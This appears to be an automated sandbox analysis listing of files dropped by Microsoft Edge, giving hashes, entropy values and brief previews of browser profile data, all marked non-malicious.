                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:DIY-Thermocam raw data (Lepton 3.x), scale 0-0, spot sensor temperature 0.000000, unit celsius, color scheme 0, calibration: offset 2048.000000, slope 17753217332035315519916605440.000000
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):4194304
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.4488504092789271
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3072:Fzde/JLMZf0Whl3zxdJBkcowJpN8C1DqKsOeWYHqefIjdug1HFL:ne/Apzxdfkcooyqs/WYHqefIjduaHl
                                                                                                                                                                                                                                                                                                MD5:CF520544FFBFDFABE3A11D423883B3ED
                                                                                                                                                                                                                                                                                                SHA1:8D202D3207EDD68D4F1B60DDD50A001997952B3A
                                                                                                                                                                                                                                                                                                SHA-256:C40463C91F0BE4669EBAB156D8A993FF0DCB6021E0F6C3A9DC5A16C0052E07CB
                                                                                                                                                                                                                                                                                                SHA-512:65390FF6CC24BE39972CEC332D31066F096E8B635B9378D785E9173A60D47BF4CC65FE32C8EFA1B842CA8F5627D2AB4DF0031514DFCC10C18BEDE1FE6FB9248E
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):280
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.0984945491284295
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:FiWWltlcUpPmPIijS3XbnbO6YBVP/Sh/JzvbYuDRBOc7cEJHCll:o1cUh4Y3LbO/BVsJDbYuDRBOycd
                                                                                                                                                                                                                                                                                                MD5:AFAC5E4CC1213807ACB7D1A0F61BCF99
                                                                                                                                                                                                                                                                                                SHA1:FEDCA0A829A0DBCCD1E9D7048398372FF9604783
                                                                                                                                                                                                                                                                                                SHA-256:FF48F538CBF3D665C9B115D6F3F6459E0CD7D9DF368E921E5A4BF2CA88E3C55F
                                                                                                                                                                                                                                                                                                SHA-512:44F1A7E8C8DD1D5CE625AE26ED4074900A979ACD34BAFB3D3B354145690D37D34E07F2D0D9DEE81BE80EAFA9E3973AB11AD6E85EB23A804958584D8DB4902D66
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:sdPC.....................cT..\.E.....P."+jDg7C0j+BlQ1Nj+QPG7Safjq+2ZvoQsMhxZL1Gpc+U="..................................................................................47DEQpj8HBSa+/TImW+5JCeuQeRkm5NMpJWZG3hSuFU=....................7aa5fc64-f4df-45d8-92ed-89470ca1c2d2............
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):40504
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.561168251614602
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:768:YQUNOrWyT7pLGLh+UW5wcOf4Ht8F1+UoAYDCx9Tuqh0VfUC9xbog/OVPQE/QIGLo:Y3IrNFch+UWacOfItu1jahE/0BrDbPvy
                                                                                                                                                                                                                                                                                                MD5:BA1D864870153BAA860CFC2F9216309B
                                                                                                                                                                                                                                                                                                SHA1:575F7D4DD59A1BD7F97B297DF081E311B4DFAF69
                                                                                                                                                                                                                                                                                                SHA-256:2B787F974C71764B0472BFC112570640AD2116A0ECF6612F2A75717BABAE6064
                                                                                                                                                                                                                                                                                                SHA-512:8477CDB1CA5D2502F5126DCDEC944B11894620BAD968F613AB33E6B59D7635D17121EE6299EB209882AC35E5B4A87848AC7F2B0ACAA9FAB5A631B210594DB8FE
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13379149891335447","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13379149891335447","location":5,"ma
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:Unicode text, UTF-8 text, with very long lines (17806), with no line terminators
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):17810
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.4816310123184975
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:192:stEJ99QTryDiuabatSuypwseDBaFvrEWuEV6PkYNP9AUn9DDhKmwwDjNrQVs8Pb+:stEPGQSu4wseDBCDv/63hyygbGzQwA3g
                                                                                                                                                                                                                                                                                                MD5:844C193E6A2C804148FD3ACEDF02DDD8
                                                                                                                                                                                                                                                                                                SHA1:0FB6F691D890475FA7B6FC0A4B76E5E1088D4F2E
                                                                                                                                                                                                                                                                                                SHA-256:544FBE08EA3D1AAF3A31FDA42BD62B77905C1C063428C7BA293E14A41C21EB2E
                                                                                                                                                                                                                                                                                                SHA-512:873388A2F622ED7D9DC06D10CDBBF6A4235CED3622EAD89306BB4055CDDFBC97AF914E085C82112F2813DFD350E00FF9445A72C850D3CDFA7ECFC46B844C30E9
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379149891956490","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340961151815957","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1597), with CRLF line terminators
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):115717
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.183660917461099
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
                                                                                                                                                                                                                                                                                                MD5:3D8183370B5E2A9D11D43EBEF474B305
                                                                                                                                                                                                                                                                                                SHA1:155AB0A46E019E834FA556F3D818399BFF02162B
                                                                                                                                                                                                                                                                                                SHA-256:6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
                                                                                                                                                                                                                                                                                                SHA-512:B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:Unicode text, UTF-8 text, with very long lines (17641), with no line terminators
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):17645
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.48490168947818
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:192:stEJ99QTryDiuabatSuypwseDBaFvrEWuEV6PkYNP9AUn9DDhKmwwDjNrQVs8Pbv:stEPGQSu4wseDBCDv/63hyygbGzQwRg
                                                                                                                                                                                                                                                                                                MD5:7AAF83E5608416F77939FDB88FC9AF37
                                                                                                                                                                                                                                                                                                SHA1:918F5BBA57D0327F978627F2B71F7C1D22D974BE
                                                                                                                                                                                                                                                                                                SHA-256:819499CDF394802C4BA4E24A51789EFC6E01CC7F3AB8800F2BBA4B63948F5E06
                                                                                                                                                                                                                                                                                                SHA-512:A29EF1E66F3B177A14EF2863E6AB6909E4A110ABEC0D8571050898830094604576A8E8CD8F8EFB803FC3A0849777982CB16E1AD617BA05A62CAC5FA73B8A9BED
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:Unicode text, UTF-8 text, with very long lines (17456), with no line terminators
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):17460
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.486521170609004
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:192:stEJ99QTryDiuabatSuypwseDBaFvrEWuEV6PkYNP9AUn9DDhKmwwDjN5s8PbV+T:stEPGQSu4wseDBCDv/63hyyxbGzQweg
                                                                                                                                                                                                                                                                                                MD5:9425123D08A078375E81682987485E64
                                                                                                                                                                                                                                                                                                SHA1:EA37FFAF22A3BF86AC81C4A5D4586C17C43F0E0A
                                                                                                                                                                                                                                                                                                SHA-256:CBB6371967D256DD33AEEF92ACA0FAEEE5DE55ABE69594865F51F25D9D340A39
                                                                                                                                                                                                                                                                                                SHA-512:0FCEBF094982837FC16557ED7828D2B58C1AE1D1D2000BC8B8114683259CD2B726EAA30A0E8612354E7F6B1CFA525DD2F0C35286D0B4F0F6F33AC11E5BC96110
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:Unicode text, UTF-8 text, with very long lines (17806), with no line terminators
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):17810
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.481652532656254
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:192:stEJ99QTryDiuabatSuypwseDBaFvrEWuEV6PkYNP9AUn9DDhKmwwDjNrQVs8PbH:stEPGQSu4wseDBCDv/63hyygbGzQwz3g
                                                                                                                                                                                                                                                                                                MD5:E94C549C73038D6294FF3A2EB20EF74B
                                                                                                                                                                                                                                                                                                SHA1:F1FB633DE0C88C788BB096D584C095957FAAE4E0
                                                                                                                                                                                                                                                                                                SHA-256:FC4080DBDF319D345F4BD37BBA777DF7222567752986AA07327C0092FD10CA69
                                                                                                                                                                                                                                                                                                SHA-512:8347A25B857FA9ED58B60D16144B0DBEEB8B37D1095BD88C9FBEEC8F6697A860D788F40607B0E91433F608244949D59B26D5F1333BA0AA49B03043E1247D0630
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):16
                                                                                                                                                                                                                                                                                                Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):33
                                                                                                                                                                                                                                                                                                Entropy (8bit):3.5394429593752084
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:iWstvhYNrkUn:iptAd
                                                                                                                                                                                                                                                                                                MD5:F27314DD366903BBC6141EAE524B0FDE
                                                                                                                                                                                                                                                                                                SHA1:4714D4A11C53CF4258C3A0246B98E5F5A01FBC12
                                                                                                                                                                                                                                                                                                SHA-256:68C7AD234755B9EDB06832A084D092660970C89A7305E0C47D327B6AC50DD898
                                                                                                                                                                                                                                                                                                SHA-512:07A0D529D9458DE5E46385F2A9D77E0987567BA908B53DDB1F83D40D99A72E6B2E3586B9F79C2264A83422C4E7FC6559CAC029A6F969F793F7407212BB3ECD51
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:...m.................DB_VERSION.1
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):16
                                                                                                                                                                                                                                                                                                Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):313
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.230355358055264
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:6:PnEWfAj1N723oH+Tcwtp3hBtB2KLl1nAWAjL+q2PN723oH+Tcwtp3hBWsIFUv:QaYebp3dFLFvVaYebp3eFUv
                                                                                                                                                                                                                                                                                                MD5:3B9B95EC908D8C2CE68F37F25E38E518
                                                                                                                                                                                                                                                                                                SHA1:196305D1F1B0059FEEE75B8B52F3B3018ECA593F
                                                                                                                                                                                                                                                                                                SHA-256:646033D26EF24DB80189539CBA5315DAC0AB1EA68756618F036DABE2CF8ABE1D
                                                                                                                                                                                                                                                                                                SHA-512:A759662A84FD97015B66B4A8C7F9E6D9A3C7B8693710F3448B8B62163F117F3E8CD53D8EED0F0444D31B3433FC5A2EF90C9963E7AF17970EB54FDF7CF714C883
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:2024/12/20-01:31:36.213 15e8 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform/auto_show_data.db since it was missing..2024/12/20-01:31:36.253 15e8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform/auto_show_data.db/MANIFEST-000001.
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):41
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                                MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                                                SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                                                SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                                                SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:.|.."....leveldb.BytewiseComparator......
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:modified
                                                                                                                                                                                                                                                                                                Size (bytes):2163821
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.222870938967056
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24576:IbPMZpVkfI/MXhZSihQgCmnVAEpENU2iOYcafbE2n:IbkZpVkfx2mjF
                                                                                                                                                                                                                                                                                                MD5:67869D93158F19B3661136D47183F773
                                                                                                                                                                                                                                                                                                SHA1:A6DA4DC49E06256F145225E88D0F8244FEF8A663
                                                                                                                                                                                                                                                                                                SHA-256:A6889A0863E55AD2C32603EACD8C801D1143C27A303AF5E7C1A727B025C1616A
                                                                                                                                                                                                                                                                                                SHA-512:5395D6D4848D8B8C5038F71147BCC0194FC837715A60E3E90350CFD9C4D87E3572B74CA219BE67E5A3D700687FEF04DCBF96345092B65A0C89995D6D927DB2FD
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):340
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.06016802836377
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:6:PnKq2PN723oH+Tcwt9Eh1tIFUt8InfZmw+In4UVnFkwON723oH+Tcwt9Eh15LJ:CvVaYeb9Eh16FUt8k/+c5OaYeb9Eh1VJ
                                                                                                                                                                                                                                                                                                MD5:4BC98CB6EDF9B385B55210439D33836F
                                                                                                                                                                                                                                                                                                SHA1:6D6C746A424859CF51687207E9DC33349902B0D7
                                                                                                                                                                                                                                                                                                SHA-256:1FFEDDBE0673895C79B5CCEDA3637A0FD690B21E5473F01EF937576052750FF2
                                                                                                                                                                                                                                                                                                SHA-512:822A608D0533BE6A4387126EDB053C92550EA560F77BC150B716F7CECDA7D612BA4F1EA477EE5B7A02278B8BAA1E521AC4770CB8DC812714315F3AAF96ADBB61
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:2024/12/20-01:31:36.060 20d4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2024/12/20-01:31:36.064 20d4 Recovering log #3.2024/12/20-01:31:36.073 20d4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/000003.log .
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):28672
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.4631638637686286
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:TLi5YFQq3qh7z3WMYziciNW9WkZ96UwOfBunK3W:TouQq3qh7z3bY2LNW9WMcUvBunb
                                                                                                                                                                                                                                                                                                MD5:C0CBB4A152BF3AA20206709F52D8E304
                                                                                                                                                                                                                                                                                                SHA1:628B2E0D89105DFCB1A7E42086AC3ED971FEFFFF
                                                                                                                                                                                                                                                                                                SHA-256:F7FDAFCDE381B8E188604AF30A830535CE9FACD4FE47F166CC47F7A32E4A2DBB
                                                                                                                                                                                                                                                                                                SHA-512:FA6DAF40C818D424A799E50CBDE0803706938662F3FD47703AD08C2ECD7FFCE0FFB1D6F32BB2A895B3F18DFD2778103C03E630CFCFB8CC210BEE45ABCCAABD3A
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 5, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 5
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):10240
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.8708334089814068
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12:LBtW4mqsmvEFUU30dZV3lY7+YNbr1dj3BzA2ycFUxOUDaazMvbKGxiTUwZ79GV:LLaqEt30J2NbDjfy6UOYMvbKGxjgm
                                                                                                                                                                                                                                                                                                MD5:92F9F7F28AB4823C874D79EDF2F582DE
                                                                                                                                                                                                                                                                                                SHA1:2D4F1B04C314C79D76B7FF3F50056ECA517C338B
                                                                                                                                                                                                                                                                                                SHA-256:6318FCD9A092D1F5B30EBD9FB6AEC30B1AEBD241DC15FE1EEED3B501571DA3C7
                                                                                                                                                                                                                                                                                                SHA-512:86FEF0E05F871A166C3FAB123B0A4B95870DCCECBE20B767AF4BDFD99653184BBBFE4CE1EDF17208B7700C969B65B8166EE264287B613641E7FDD55A6C09E6D4
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):352
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.140350436860484
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:6:PF1FN+q2PN723oH+TcwtnG2tMsIFUt8IFzeZmw+IFzaVkwON723oH+TcwtnG2tM2:N1FN+vVaYebn9GFUt8c6/+cWV5OaYebB
                                                                                                                                                                                                                                                                                                MD5:9CD3FD70FFEADB325D53F53AFFB72FFC
                                                                                                                                                                                                                                                                                                SHA1:2B2CCB7ACE1E4FEAD7428B48191F1929139D6562
                                                                                                                                                                                                                                                                                                SHA-256:0BFDD6B15DCA2FD0AACA01FC6CC6C7753008A0EF0699FCF6B2125BB80A8436F1
                                                                                                                                                                                                                                                                                                SHA-512:B0D4A600AB7EC25939B4CC1ACCD3594352929C98A53F791CDEA422ECD2FBC30A8391C708F9C4202B9CE8282442AA6D827118D78D2AF1330465050E8BDEC16C73
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:2024/12/20-01:31:31.350 1d7c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.2024/12/20-01:31:31.351 1d7c Recovering log #3.2024/12/20-01:31:31.351 1d7c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/000003.log .
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 6
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):20480
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.6132725523844721
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:TLapR+DDNzWjJ0npnyXKUO8+j2Kjp/MmL:TO8D4jJ/6Up+h1p
                                                                                                                                                                                                                                                                                                MD5:F6B3424BAA0A64BD1B8B03AD6EBA2AA0
                                                                                                                                                                                                                                                                                                SHA1:B0588F344A34715F4AAE7F6428DDDB3FD51B7300
                                                                                                                                                                                                                                                                                                SHA-256:1ACB4B94E5B1BB5850F1A954E9A7137E403C066386CA68299B2CCDE4072CD69C
                                                                                                                                                                                                                                                                                                SHA-512:D281B313594E0FC431155351291E925A9589514E6F378DA9D0BEEAEF739620F6F249EEFCE5D5A2D7623A778ECD97724393AD10EEF0224A6AC19DBD264A3F4FC0
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):16
                                                                                                                                                                                                                                                                                                Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):375520
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.354089591074268
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:6144:hA/imBpx6WdPSxKWcHu5MURacq49QxxPnyEndBuHltBfdK5WNbsVEziP/CfXtLPz:hFdMyq49tEndBuHltBfdK5WNbsVEziPU
                                                                                                                                                                                                                                                                                                MD5:FB7FC370F40E7DA5571546427BEBC37A
                                                                                                                                                                                                                                                                                                SHA1:C9AC33C56CF08DC5E1BF758E5BE0F75F06469BDA
                                                                                                                                                                                                                                                                                                SHA-256:FB670CAB4EE2E3B8CA861EFA906DC0B2075DB335417FFFF01C0764295FE128C9
